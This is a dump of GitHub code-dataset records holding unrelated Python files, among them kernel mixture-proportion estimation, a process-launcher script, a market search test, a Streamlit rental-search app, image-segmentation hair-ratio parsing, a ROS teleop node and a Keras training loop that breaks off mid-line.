webhook.execute()\n","repo_name":"gmguild/gmJEWEL","sub_path":"backend/scanners/jewel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35136,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4050878382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDO MIXTURE PROPORTION ESTIMATION \nUsing gradient thresholding of the $\\C_S$-distance\n\"\"\"\nfrom cvxopt import matrix, solvers, spmatrix\nfrom math import sqrt\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.close('all')\nimport scipy.linalg as scilin\n\n\ndef find_nearest_valid_distribution(u_alpha, kernel, initial=None, reg=0):\n \"\"\" (solution,distance_sqd)=find_nearest_valid_distribution(u_alpha,kernel):\n Given a n-vector u_alpha summing to 1, with negative terms, \n finds the distance (squared) to the nearest n-vector summing to 1, \n with non-neg terms. Distance calculated using nxn matrix kernel. 
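The scanner record schedules itself with the stdlib sched module: run() re-enters itself via scheduler.enter(RUN_EVERY_X_SECONDS, ...) at the end of each pass, so the delay runs between passes rather than as a fixed period. The re-arming pattern in minimal form (three iterations instead of the original's endless loop):

import sched
import time

scheduler = sched.scheduler(time.time, time.sleep)
runs = []

def run(sc):
    runs.append(time.time())
    if len(runs) < 3:                 # re-arm; the original re-enters forever
        sc.enter(0.1, 1, run, (sc,))  # delay starts after this pass ends

scheduler.enter(0.1, 1, run, (scheduler,))
scheduler.run()  # returns once the event queue is empty
print(len(runs))  # 3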
\n Regularization parameter reg -- \n\n min_v (u_alpha - v)^\\top K (u_alpha - v) + reg* v^\\top v\"\"\"\n\n P = matrix(2 * kernel)\n n = kernel.shape[0]\n q = matrix(np.dot(-2 * kernel, u_alpha))\n A = matrix(np.ones((1, n)))\n b = matrix(1.)\n G = spmatrix(-1., range(n), range(n))\n h = matrix(np.zeros(n))\n dims = {'l': n, 'q': [], 's': []}\n solvers.options['show_progress'] = False\n solution = solvers.coneqp(\n P,\n q,\n G,\n h,\n dims,\n A,\n b,\n initvals=initial\n )\n distance_sqd = solution['primal objective'] + np.dot(u_alpha.T,\n np.dot(kernel, u_alpha))[0, 0]\n return (solution, distance_sqd)\n\n\ndef get_distance_curve(\n kernel,\n lambda_values,\n N,\n M=None,\n ):\n \"\"\" Given number of elements per class, full kernel (with first N rows corr.\n to mixture and the last M rows corr. to component, and set of lambda values\n compute $\\hat d(\\lambda)$ for those values of lambda\"\"\"\n\n d_lambda = []\n if M == None:\n M = kernel.shape[0] - N\n prev_soln=None \n for lambda_value in lambda_values:\n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n #Can I save distance here?\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel, initial=prev_soln)\n prev_soln = solution\n d_lambda.append(sqrt(distance_sqd))\n d_lambda = np.array(d_lambda)\n return d_lambda\n\n\ndef compute_best_rbf_kernel_width(X_mixture,X_component): \n N=X_mixture.shape[0]\n M=X_component.shape[0]\n # compute median of pairwise distances\n X=np.concatenate((X_mixture,X_component))\n dot_prod_matrix=np.dot(X,X.T)\n norms_squared=sum(np.multiply(X,X).T) \n distance_sqd_matrix=np.tile(norms_squared,(N+M,1)) + \\\n np.tile(norms_squared,(N+M,1)).T - 2*dot_prod_matrix \n kernel_width_median = sqrt(np.median(distance_sqd_matrix))\n kernel_width_vals= np.logspace(-1,1,5) * kernel_width_median\n \n # Find best kernel width\n \n max_dist_RKHS=0\n for kernel_width in kernel_width_vals: \n kernel=np.exp(-distance_sqd_matrix/(2.*kernel_width**2.)) \n dist_diff = np.concatenate((np.ones((N, 1)) / N, \n -1 * np.ones((M,1)) / M))\n distribution_RKHS_distance = sqrt(np.dot(dist_diff.T, \n np.dot(kernel, dist_diff))[0,0])\n if distribution_RKHS_distance > max_dist_RKHS:\n max_dist_RKHS=distribution_RKHS_distance\n best_kernel_width=kernel_width \n kernel=np.exp(-distance_sqd_matrix/(2.*best_kernel_width**2.))\n return best_kernel_width,kernel\n\n \ndef mpe(kernel,N,M,nu,epsilon=0.04,lambda_upper_bound=8.):\n \"\"\" Do mixture proportion estimation (as in paper)for N points from \n mixture F and M points from component H, given kernel of size (N+M)x(N+M), \n with first N points from the mixture and last M points from \n the component, and return estimate of lambda_star where\n G =lambda_star*F + (1-lambda_star)*H\"\"\"\n\n dist_diff = np.concatenate((np.ones((N, 1)) / N, -1 * np.ones((M,1)) / M))\n distribution_RKHS_distance = sqrt(np.dot(dist_diff.T, \n np.dot(kernel, dist_diff))[0,0])\n lambda_left=1.\n lambda_right=lambda_upper_bound \n while lambda_right-lambda_left>epsilon:\n lambda_value=(lambda_left+lambda_right)/2. \n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel)\n d_lambda_1=sqrt(distance_sqd)\n \n lambda_value=(lambda_left+lambda_right)/2. + epsilon/2. 
\n u_lambda = lambda_value / N * np.concatenate((np.ones((N, 1)),\n np.zeros((M, 1)))) + (1 - lambda_value) / M \\\n * np.concatenate((np.zeros((N, 1)), np.ones((M, 1))))\n (solution, distance_sqd) = \\\n find_nearest_valid_distribution(u_lambda, kernel)\n d_lambda_2=sqrt(distance_sqd)\n \n slope_lambda=(d_lambda_2 - d_lambda_1)*2./epsilon \n \n if slope_lambda > nu*distribution_RKHS_distance:\n lambda_right=(lambda_left+lambda_right)/2.\n else:\n lambda_left=(lambda_left+lambda_right)/2.\n \n return (solution, (lambda_left+lambda_right)/2.)\n \n\ndef wrapper(X_mixture,X_component): \n \"\"\" Takes in 2 arrays containing the mixture and component data as \n numpy arrays, and prints the estimate of kappastars using the two gradient \n thresholds as detailed in the paper as KM1 and KM2\"\"\"\n \n N=X_mixture.shape[0] \n M=X_component.shape[0]\n best_width,kernel=compute_best_rbf_kernel_width(X_mixture,X_component) \n lambda_values=np.array([1.00,1.05]) \n dists=get_distance_curve(kernel,lambda_values,N=N,M=M)\n begin_slope=(dists[1]-dists[0])/(lambda_values[1]-lambda_values[0])\n dist_diff = np.concatenate((np.ones((N, 1)) / N, -1 * np.ones((M,1)) / M))\n distribution_RKHS_dist = sqrt(np.dot(dist_diff.T, np.dot(kernel, dist_diff))[0,0])\n thres_par=0.2 \n nu1=(1-thres_par)*begin_slope + thres_par*distribution_RKHS_dist\n nu1=nu1/distribution_RKHS_dist \n (solution, lambda_star_est_1)=mpe(kernel,N,M,nu=nu1)\n kappa_star_est_1=(lambda_star_est_1-1)/lambda_star_est_1 \n nu2=1/sqrt(np.min([M,N]))\n nu2=nu2/distribution_RKHS_dist\n if nu2>0.9:\n nu2=nu1\n (solution, lambda_star_est_2)=mpe(kernel,N,M,nu=nu2) \n kappa_star_est_2=(lambda_star_est_2-1)/lambda_star_est_2\n return (kappa_star_est_2,kappa_star_est_1, solution)\t\n \ndef id_example(total_observations = 1000, kappa_star = 0.4, size = 100, mean_comp = 10.):\n \"\"\"Attempts to show how we might adapt the algorithm to give\n an identification of the most similar observations\"\"\"\n total_observations = total_observations\n kappa_star = kappa_star\n size = size\n mean_comp = np.repeat(mean_comp, size)\n X_mixture = np.concatenate((np.random.randn(int((1-kappa_star)*total_observations/2), size), \n np.random.randn(int(kappa_star*total_observations/2), size)+\n mean_comp))\n X_component = np.random.randn(total_observations/2, size)+ mean_comp\n (KM1,KM2,solution)=wrapper(X_mixture,X_component)\n\n #Take the part of the solution that comes from the mixture\n mixture_solution = solution['x'][0:(X_mixture.shape[0]-1)]\n print(\"Estimate of Kappa^star = \", KM2)\n print(\"\\n Probabilities: \")\n print(mixture_solution)\n\n #Now, using the solution, find the component in the mixture\n #First, define container for the results\n comp_in_mixture = np.ones((2,int(round(KM2*X_mixture.shape[0]))))\n\n #Next, find solutions that have the smallest probability -- these are the ones most likely from the component\n t = int(0)\n for i in mixture_solution:\n #Find the minimum probability record so far\n max_prob = np.argmax(comp_in_mixture[1])\n\n #If the next record has a higher probability, replace the minimum\n if i < comp_in_mixture[1][max_prob]:\n comp_in_mixture[0][max_prob] = t\n comp_in_mixture[1][max_prob] = i\n\n #Increment the index\n t+=1\n return (KM2, comp_in_mixture)\n\n\nif __name__=='__main__':\n \"\"\" Calls wrapper with a GMM as the mixture distribution and one of the \n components as the component distribution. 
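mpe() in this record runs a bisection over lambda in [1, lambda_upper_bound], but the branch test is not a sign change of the function itself: it solves the QP at lambda and at lambda + epsilon/2, forms the finite-difference slope (d(lambda + eps/2) - d(lambda)) * 2/eps, and moves left or right depending on whether that slope exceeds nu times the RKHS distance between the empirical distributions. The search skeleton on a toy convex curve — the curve and threshold below are illustrative, not derived from the record:

def threshold_bisect(d, nu, left=1.0, right=8.0, eps=0.04):
    # Bisect on lambda; branch on the numerically estimated slope of d.
    while right - left > eps:
        mid = (left + right) / 2.0
        slope = (d(mid + eps / 2.0) - d(mid)) * 2.0 / eps
        if slope > nu:
            right = mid  # slope already too steep: answer lies to the left
        else:
            left = mid
    return (left + right) / 2.0

d = lambda lam: max(0.0, lam - 2.5) ** 2  # flat, then increasingly steep
print(threshold_bisect(d, nu=1.0))        # converges near 3.0 for this curve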
Replace the X_mixture and X_component \n variables according to your data\"\"\"\n total_observations = np.random.randint(2,1000)\n kappa_star = np.random.uniform(0.1,0.9)\n size = np.random.randint(2,100)\n mean_comp=np.random.uniform(0,15,size)\n X_mixture = np.concatenate((np.random.randn(int((1-kappa_star)*total_observations/2), size), \n np.random.randn(int(kappa_star*total_observations/2), size)+\n mean_comp))\n X_component = np.random.randn(total_observations/2, size)+ mean_comp\n print(\"Kappa* = \",kappa_star)\n (KM1,KM2,solution)=wrapper(X_mixture,X_component)\n print(\"Observations = \",total_observations)\n print(\"Covariates = \",size)\n print(\"KM1_estimate = \",KM1)\n print(\"KM2_estimate = \",KM2)\n print(\"Solution = \", solution)\n","repo_name":"stewarthkerr/STAT771","sub_path":"project/code/Kernel_MPE_grad_threshold.py","file_name":"Kernel_MPE_grad_threshold.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42177189790","text":"#!/usr/bin/env python\nimport os\nimport signal\nimport sys\n\n# Signal handler for ctrl+c\ndef signalHandler(sig, frame):\n os.system(\"pkill flask\")\n os.system(\"pkill node\")\n os.system(\"pkill 'ng serve'\")\n os.system(\"pkill 'Python'\")\n print(\"App closed\")\n sys.exit(0)\n\n# Bind signal SIGINT\nsignal.signal(signal.SIGINT, signalHandler)\n\n# Start server\nos.system(\"python3 server.py &\")\n\n# Start client\nos.system(\"python3 client.py &\")\n\n# Wait for ctrl+c\nsignal.pause()\n\n","repo_name":"jferdelyi/Generator","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"185297089","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport runner # noqa\n\nfrom core.types import MarketSku, Model, Offer, Region, RegionalModel, Shop\nfrom core.testcase import TestCase, main\n\n\nclass _C:\n rid_unknown = 3\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n cls.disable_check_empty_output()\n\n cls.index.regional_models += [\n RegionalModel(hyperid=175941311, rids=[54, 194], has_good_cpa=False, has_cpa=True),\n ]\n\n cls.index.models += [\n Model(hyperid=175941311, hid=44),\n Model(hyperid=10, hid=44),\n Model(hyperid=200, hid=55),\n ]\n\n for i in range(20):\n cls.index.models.append(Model(hyperid=201 + i, hid=55))\n\n cls.index.regiontree = [\n Region(rid=194, name='Саратов'),\n Region(\n rid=54,\n name='Екб',\n children=[\n Region(rid=100500, name='улица в ЕКб'),\n ],\n ),\n ]\n\n cls.index.shops += [\n Shop(fesh=4, priority_region=54, regions=[54, 194], cpa=Shop.CPA_REAL, name='СPA Екб'),\n Shop(fesh=5, priority_region=54, regions=[54, 194], cpa=Shop.CPA_NO, cpc=Shop.CPC_REAL, name='CPC Екб'),\n ]\n\n cls.index.mskus += [\n MarketSku(hyperid=175941311, hid=44, sku=1010),\n MarketSku(hyperid=665306170, hid=44, sku=1020),\n MarketSku(hyperid=10, hid=44, sku=1030),\n MarketSku(hyperid=200, hid=55, sku=1050),\n ]\n\n cls.index.offers += [\n Offer(fesh=4, title=\"CPA офер #2\", cpa=Offer.CPA_REAL, hyperid=175941311, price=200, sku=1010, hid=44),\n Offer(\n fesh=5,\n title=\"CPA_NO офер, модель из конфига\",\n cpa=Offer.CPA_NO,\n price=100,\n hyperid=175941311,\n sku=1010,\n hid=44,\n ),\n Offer(fesh=5, title=\"CPA_NO 10\", cpa=Offer.CPA_NO, hyperid=10, sku=1030, hid=44),\n Offer(fesh=4, title=\"CPA_REAL 55\", cpa=Offer.CPA_REAL, hyperid=200, price=555, sku=1050, hid=55),\n ]\n\n # 
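The start.py record above wires a SIGINT handler that kills its child processes and exits, then parks the main thread in signal.pause() until a signal arrives. The registration pattern without the pkill side effects — run it interactively on a POSIX system, since signal.pause() is unavailable on Windows:

import signal
import sys

def handle_sigint(sig, frame):
    # Clean-up would go here; the original shells out to pkill its children.
    print("App closed")
    sys.exit(0)

signal.signal(signal.SIGINT, handle_sigint)
print("Press Ctrl+C to stop")
signal.pause()  # block until a signal arrives (POSIX only)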
Несколько моделей в магазинах в Екатеринбурге\n # У модели 665306170 нет офферов\n # У модели 10 есть только cpc\n # В выдаче должны быть только эти две модели, у остальных есть cpa\n # Параметр use-default-offers не должен повлиять\n def test_out_of_stock_cpa_model_filter(self):\n \"\"\"Проверяем выдачу моделей с фильтрацией по отсутствию cpa-офферов\"\"\"\n for do in ('0', '1'):\n request = (\n 'place=prime&pp=18&entities=product&local-offers-first=0&rids=54&hid=44'\n + '&cpa-out-of-stock-models=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 2,\n \"totalModels\": 2,\n \"results\": [\n {\"id\": 10, \"type\": \"model\", \"offers\": {\"count\": 0}},\n {\"id\": 665306170, \"type\": \"model\", \"offers\": {\"count\": 0}},\n ],\n }\n },\n allow_different_len=False,\n )\n\n # https://st.yandex-team.ru/MARKETOUT-44507 - не отдаем модели \"не в продаже\" для экспресса\n def test_out_of_stock_cpa_model_filter_with_express(self):\n \"\"\"Проверяем выдачу моделей с фильтрацией по отсутствию cpa-офферов + с фильтром по экспресс-доставке.\n Условия аналогичны test_out_of_stock_cpa_model_filter, но не должны найти ничего, хотя у моделей нет cpa-офферов.\"\"\"\n\n for do in ('0', '1'):\n request = (\n 'place=prime&pp=18&entities=product&local-offers-first=0&&rids=54&hid=44'\n + '&cpa-out-of-stock-models=1&filter-express-delivery=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\"search\": {\"total\": 0, \"totalModels\": 0, \"results\": []}},\n allow_different_len=False,\n )\n\n def test_out_of_stock_cpa_model_filter_shutdown(self):\n \"\"\"Проверяем отключение выдачи через rearr\"\"\"\n\n for do in ('0', '1'):\n request = (\n 'place=prime&pp=18&entities=product&local-offers-first=0&&rids=54&hid=44&cpa-out-of-stock-models=1'\n + '&rearr-factors=market_disable_out_of_stock_models_search=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\"search\": {\"total\": 0, \"totalModels\": 0, \"results\": []}},\n allow_different_len=False,\n )\n\n # Проверяем выдачу моделей не в продаже внутри основной выдачи на прайме\n # Условия теста - см. test_out_of_stock_cpa_model_filter + нужен cpa=real\n # В выдаче должны быть две модели не в продаже + обычные результаты\n def test_out_of_stock_models_on_prime(self):\n \"\"\"Проверяем подмешивание моделей с фильтрацией по отсутствию cpa-офферов в основную выдачу; требуется cpa=only\"\"\"\n request = (\n 'place=prime&pp=18&local-offers-first=0&rids=54&hid=44'\n + '&use-default-offers=1&cpa=real'\n + '&rearr-factors=market_oos_enable=1'\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"id\": 10, \"entity\": \"product\", \"offers\": {\"count\": 0}},\n {\"id\": 665306170, \"entity\": \"product\", \"offers\": {\"count\": 0}},\n ],\n }\n },\n allow_different_len=True,\n )\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"entity\": \"offer\"},\n ],\n }\n },\n allow_different_len=True,\n )\n\n # Проверяем ограничение на количество моделей (не в продаже) в основной выдаче\n # Условия теста - см. 
test_out_of_stock_cpa_model_filter + нужен cpa=real + нужны схлопывание с разгруппировкой\n # В выдаче должны быть 5 моделей не в продаже (hid=55, hyperid>200) + тестовый схлопнутый cpa-оффер (hid=55, hyperid=200)\n def test_out_of_stock_models_limit_on_prime(self):\n # с how=random используется plain-итератор, без - rearrangeable\n for extra_args in ('', '&how=random'):\n request = (\n 'place=prime&pp=18&local-offers-first=0&rids=54&hid=55'\n + '&use-default-offers=1&cpa=real'\n + '&allow-collapsing=1&allow-ungrouping=1'\n + '&rearr-factors=market_oos_enable=1;market_oos_limit=5;market_oos_limit_per_shard=10'\n + extra_args\n )\n\n response = self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"id\": 200, \"entity\": \"product\", \"offers\": {\"count\": 1}},\n ],\n }\n },\n allow_different_len=True,\n )\n\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"entity\": \"product\", \"offers\": {\"count\": 0}},\n ]\n * 5,\n }\n },\n allow_different_len=True,\n )\n\n assert len(response.root['search']['results']) == 6\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_out_of_stock_models.py","file_name":"test_out_of_stock_models.py","file_ext":"py","file_size_in_byte":8845,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"817713489","text":"from typing import List\n\n\nclass Solution:\n def findWords(self, words: List[str]) -> List[str]:\n row1 = set('qwertyuiopQWERTYUIOP')\n row2 = set('asdfghjklASDFGHJKL')\n row3 = set('zxcvbnmZXCVBNM')\n result = []\n for word in words:\n w = set(list(word))\n if w.issubset(row1) or w.issubset(row2) or w.issubset(row3):\n result.append(word)\n return result","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"keyboradRow.py","file_name":"keyboradRow.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18410157555","text":"#必要なライブラリをインポート\nimport pandas as pd\nimport streamlit as st\nimport numpy as np\n\n\nst.title('お得な物件を簡単検索!!')\n\nst.text('下記の要素から条件を絞って、物件を抽出しましょう')\nst.text('\"予測値との差\"の値が小さいほど、家賃の相場よりも安いということになります。')\n\nst.header('操作説明')\nst.text('1. \"最低築年数\"の値を決める。\"最高築年数\"の値を決める。')\nst.text('2. 希望の\"間取り\"を選択')\nst.text('3. 
\"区\"\"、\"市町村\"を選択する')\n\n\n#st.subheader('This is a subheader')\n#st.text('Hello World!,this is text')\n\n# st.write()はMarkdown表記対応\n#st.write('# headline1')\n# 以下のように明示的に書くことも可能\n#st.markdown('## headline2')\n\n#st.write('# 全体の流れ')\nst.text('↓ 東京新宿区の全ての物件')\n\n#DF読み込み\ndf = pd.read_csv('new_geo_df_search.csv')\n\ndf = df.drop(['間取り'],axis=1)\n\n#Streamlitのマジックコマンドst.write()を使用して物件情報を表示\nst.write(df)\n\n#物件の絞り込み機能の追加:\n#Streamlitのウィジェットを使用して、家賃、間取り、専有面積などの絞り込み条件を指定できるようにする。\n\n# 家賃の範囲を指定するスライダー\nage_range = st.slider('築年数の範囲', min_value=0, max_value=int(df['築年数'].max()), value=(0, int(df['築年数'].max())), step=1)\nmin_age = age_range[0]\nmax_age = age_range[1]\n\n\n# 間取りの選択肢\nroom_types = ['DK', 'K', 'L', 'S']\nselected_room_type = st.multiselect('間取り', room_types)\n\n# 区の選択肢\nwards = df['区'].unique()\nselected_wards = st.selectbox('区', wards)\n\n# 市町村の選択肢\ncities = ['すべて選択'] + df['市町村'].unique().tolist()\nselected_cities = st.multiselect('市町村', cities)\n\n# 選択された区,市町村をリストとして扱う\n# isin()を使う際にリストである必要がある。\nselected_wards = [selected_wards] if isinstance(selected_wards, str) else selected_wards\nselected_cities = [selected_cities] if isinstance(selected_cities, str) else selected_cities\n\n\n# 絞り込み条件に基づいて物件をフィルタリング\n#、市町村の選択肢に「すべて選択」が追加され、選択された市町村に基づいて物件を絞り込む処理が行われる。\n# また、選択された市町村が「すべて選択」の場合は、市町村の絞り込み条件を無視して区の条件のみを適用\n\n\nif 'すべて選択' in selected_cities:\n filtered_df = df[\n (df['築年数'] >= min_age) & (df['築年数'] <= max_age) &\n (df['間取りDK'] == (selected_room_type == 'DK')) &\n (df['間取りK'] == (selected_room_type == 'K')) &\n (df['間取りL'] == (selected_room_type == 'L')) &\n (df['間取りS'] == (selected_room_type == 'S')) &\n (df['区'].isin(selected_wards))\n ]\nelse:\n filtered_df = df[\n (df['築年数'] >= min_age) & (df['築年数'] <= max_age) &\n (df['間取りDK'] == (selected_room_type == 'DK')) &\n (df['間取りK'] == (selected_room_type == 'K')) &\n (df['間取りL'] == (selected_room_type == 'L')) &\n (df['間取りS'] == (selected_room_type == 'S')) &\n (df['区'].isin(selected_wards)) &\n (df['市町村'].isin(selected_cities))\n ]\n\n\n \n#st.write('## 物件を出力!!')\n\nst.text('並び順は予測値との差になってます。')\n# 絞り込んだ物件情報の表示\nst.write(filtered_df.sort_values(by='予測値との差',ascending=True))\n\nst.text('マッピング')\n# マッピングのための緯度経度データを作成\n # 緯度経度データを抽出し、欠損値を除外\ndf_map = filtered_df.rename(columns={'緯度': 'latitude', '経度': 'longitude'})[['latitude', 'longitude']].dropna()\n# マップをプロット\nst.map(df_map)\n\n\n\n\nst.header('今後の改良点')\nst.text('1. 全体的なデザイン')\nst.text('2. 列の並び替え')\nst.text('4. 出力された物件情報がもっと直感的にわかりやすいものにしたい')\nst.text('5. 列がonehot-encodingのままなので、整理したい')\nst.text('7. 機械学習をして分析アプリとしての機能も追加したい。')\nst.text('8. 間取りの部分をなんとかする。')\nst.text('9. googlemapにも表示させてやりたい。これに関しては住所がざっくりしてるからgoogleマップの良さが出ない。')\nst.text('10. 物件を選んだら、マップ上で光るようにしたい')\n\n\n","repo_name":"miyazaki-tsubasa/suumo","sub_path":"suumo_code.py","file_name":"suumo_code.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33644232718","text":"import argparse\nimport os\nfrom pathlib import Path\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef parse_bisenet_hair_ratio(path):\n hair_ratio_list = []\n for subdir, dirs, files in os.walk(path):\n print(subdir)\n for filename in tqdm(files):\n #For BiSeNet segmentation there is a color mask version and mask version. 
Just using the mask!\n if filename.split(\"_\")[-2] != \"color\":\n img = cv2.imread(subdir + os.sep + filename, cv2.IMREAD_GRAYSCALE)\n\n # 17 is the hair region\n img[img!=17] = 0\n img[img== 17] = 1\n\n hair_area = len(img[img == 1])\n total_area = img.shape[0] * img.shape[1]\n\n per_skin = round(hair_area/total_area *100,2)\n\n filename = filename.replace(\"_mask.png\", \".JPG\")\n\n hair_ratio_list.append([filename,per_skin])\n\n return hair_ratio_list\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Get the hair ratio for all images given the path to BiSeNet segmentation mask\")\n parser.add_argument(\"--source\", \"-s\", required = True, help=\"Path to source directory of BiseNet. Make sure this is for each group - each separate for C_M,C_F and so on\")\n parser.add_argument(\"--destination\", \"-d\", required = True, help=\"path to save txt file\")\n parser.add_argument(\"--name\", \"-n\", required = True, help=\"Name to save the file.\")\n args = parser.parse_args()\n\n hair_ratio_list = parse_bisenet_hair_ratio(args.source)\n\n if not os.path.exists(args.destination):\n os.makedirs(args.destination)\n \n save_name = os.path.join(args.destination,args.name)\n\n np.savetxt(\"{}.txt\".format(save_name), hair_ratio_list, fmt='%s', delimiter=' ', newline='\\n')","repo_name":"abhatta1234/codesForPapers_PhD_NotreDame","sub_path":"Hair-Dimension-Balancing_ArXiv_2021/prelims/bisenet_parsing.py","file_name":"bisenet_parsing.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35367468236","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist # import Twist message\n\ndef multiplier_msg(data,self):\n self.distance_multiplier = data.linear.y # set linear multiplier\n self.angle_multiplier = data.angular.y # set angular multiplier\n\ndef turtle_msg(data, self):\n self.x = data.linear.x # set linear component\n self.z = data.angular.z # set angular component\n\n dist = 75*self.distance_multiplier # set a distance offset\n ang = 25*self.angle_multiplier # set the angle offest\n\n # retrieve the target parameters\n self.distance = rospy.get_param(\"distance/target\")\n self.angle = rospy.get_param(\"angle/target\")\n\n if self.x > 0:\n # move forward\n self.distance = self.distance + dist\n elif self.x < 0:\n # move backward\n self.distance = self.distance - dist\n elif self.z > 0:\n # turn left\n self.angle = self.angle + ang\n elif self.z < 0:\n # turn right\n self.angle = self.angle - ang\n else:\n rospy.loginfo(\"Parse error\")\n\n # set the target parameters\n rospy.set_param(\"distance/target\",self.distance)\n rospy.set_param(\"angle/target\",self.angle)\n\nclass TheNode(object):\n # This class holds the rospy logic for updating the PID targets\n # from a published teleop_turtle_key message or keyboard input\n\n def __init__(self):\n\n rospy.init_node('pid_remote_drive') # intialize node\n\n self.x = 0 # linear component variable\n self.z = 0 # angular component variable\n\n self.distance = 0 # distance variable\n self.angle = 0 # angle variable\n\n self.angle_multiplier = 1 # angle multiplier variable\n self.distance_multiplier = 1 # distance multiplier variable\n\n def main_loop(self):\n # initialize subscriber node for messages from teleop_turtle_key\n rospy.Subscriber('/turtle1/cmd_vel', Twist, turtle_msg, self)\n rospy.Subscriber('/key_input', Twist, multiplier_msg, self)\n\n rospy.spin() # wait for messages\n\nif __name__ 
== '__main__':\n try:\n a = TheNode()\n a.main_loop()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"dacools/lab2","sub_path":"scripts/pid_remote_drive.py","file_name":"pid_remote_drive.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38073255754","text":"#NN test file\n#####################################################################\n#Importing Packages\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.callbacks import ModelCheckpoint\nimport keras as keras\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.utils import shuffle\n\n\n\n######################################################################\n#Reading in the features and making a Train/test split\npq_X_train = pq.read_table('Feature_train.parquet')\npq_y_train = pq.read_table('Stress_train.parquet')\n\npq_X_test = pq.read_table('Feature_test.parquet')\npq_y_test = pq.read_table('Stress_test.parquet')\n\nX_train= pq_X_train.to_pandas()\ny_train= pq_y_train.to_pandas()\nX_test= pq_X_test.to_pandas()\ny_test= pq_y_test.to_pandas()\n\nprint(X_train.shape, y_train.shape)\nprint(X_test.shape, y_test.shape)\ny_train=y_train.to_numpy()\ny_test=y_test.to_numpy()\ny_train=y_train.ravel()\ny_test=y_test.ravel()\n\n# ########################################################################\nLDA\nlda=LDA(n_components=1)\ntrain_lda=lda.fit(X_train, y_train)\ntest_lda=lda.predict(X_test)\n\n# print(test_lda.shape)\n# print(y_test.shape)\n\n#######################################################################\n# Neural Network\n\n# Best Batchsize= 16\n# Best Hidden layer nodes= approx 16,32,32\n# Best droppout= 0.19\n# Best optimizer = Nadam\n# Best loss = \"binary_crossentropy\"\n\nfor j in range (10):\n print(j)\n dropoutje=0.1*j\n\n input_nodes = X_train.shape[1]\n hidden_layer_1_nodes = 16\n hidden_layer_2_nodes = 32\n hidden_layer_3_nodes = 32\n output_layer = 1\n\n # initializing a sequential model\n full_model = Sequential()\n\n # adding layers\n full_model.add(Dense(hidden_layer_1_nodes,input_dim=input_nodes , activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(hidden_layer_2_nodes, activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(hidden_layer_3_nodes, activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(output_layer, activation='sigmoid'))\n\n #full_model.summary()\n\n # Compiling the DNN\n full_model.compile(optimizer=\"Nadam\", loss=\"binary_crossentropy\", metrics=['accuracy'])\n\n history = full_model.fit(X_train,y_train,validation_data=(X_test,y_test), epochs=512, batch_size=(16), verbose=0)\t\n\n req1=np.mean(history.history['val_accuracy'])>=np.mean(history.history['accuracy'])\n req2=np.max(history.history['val_accuracy'])>=np.max(history.history['accuracy'])\n print(\"Val:\",np.max(history.history['val_accuracy']), \"Acc\", np.max(history.history['accuracy']))\n #req3=np.max(history.history['val_accuracy'])>0.96\n if (req1==True and req2==True): # (req1==True and req2==True): and \n print(\"This is the accuracy:\", np.max(history.history['accuracy']))\n full_model.save(f\"New best NN {j}\")\n plt.figure()\n plt.plot(history.history['accuracy'], label = 
